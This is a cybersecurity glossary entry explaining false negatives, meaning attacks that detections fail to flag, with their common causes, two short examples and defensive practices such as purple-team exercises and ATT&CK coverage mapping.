False Negative
What is False Negative?
False NegativeMalicious activity that a detection failed to flag, leaving the threat unnoticed and allowing the attacker to continue without alerting defenders.
A false negative is the silent failure of a detection: a real attack happens but no alert fires, so analysts have no chance to respond. Causes include missing log sources, signatures that the attacker evaded, detections scoped too narrowly, broken pipelines, time-window gaps, and adversary tradecraft such as living-off-the-land or encrypted command and control. False negatives are harder to measure than false positives because by definition they are invisible. Teams reduce them through purple-team exercises, breach-and-attack simulation, MITRE ATT&CK coverage mapping, detection unit tests, and ongoing telemetry gap analysis.
● Examples
- 01
An adversary uses signed Windows binaries (LOLBins) to run commands that no signature catches.
- 02
A new malware family is missed because its TLS C2 traffic is not inspected by the proxy.
● Frequently asked questions
What is False Negative?
Malicious activity that a detection failed to flag, leaving the threat unnoticed and allowing the attacker to continue without alerting defenders. It belongs to the Defense & Operations category of cybersecurity.
What does False Negative mean?
Malicious activity that a detection failed to flag, leaving the threat unnoticed and allowing the attacker to continue without alerting defenders.
How does False Negative work?
A false negative is the silent failure of a detection: a real attack happens but no alert fires, so analysts have no chance to respond. Causes include missing log sources, signatures that the attacker evaded, detections scoped too narrowly, broken pipelines, time-window gaps, and adversary tradecraft such as living-off-the-land or encrypted command and control. False negatives are harder to measure than false positives because by definition they are invisible. Teams reduce them through purple-team exercises, breach-and-attack simulation, MITRE ATT&CK coverage mapping, detection unit tests, and ongoing telemetry gap analysis.
How do you defend against False Negative?
Defences for False Negative typically combine technical controls and operational practices, as detailed in the full definition above.
What are other names for False Negative?
Common alternative names include: FN, Missed detection.
● Related terms
- defense-ops№ 406
False Positive
A security alert that flags benign activity as malicious, costing analyst time and eroding trust in the detection that produced it.
- defense-ops№ 307
Detection Engineering
The discipline of designing, testing, deploying, and maintaining security detections as code, with measurable coverage of adversary techniques.
- compliance№ 687
MITRE ATT&CK
A globally accessible knowledge base of adversary tactics and techniques observed in real-world attacks, maintained by MITRE.
- defense-ops№ 1147
Threat Hunting
Proactive, hypothesis-driven search through telemetry to uncover threats that have evaded existing detections.
- defense-ops№ 1039
SIEM
A platform that aggregates, normalizes and correlates security telemetry from across the enterprise to enable detection, investigation, compliance and reporting.
● See also
- № 041Alert Fatigue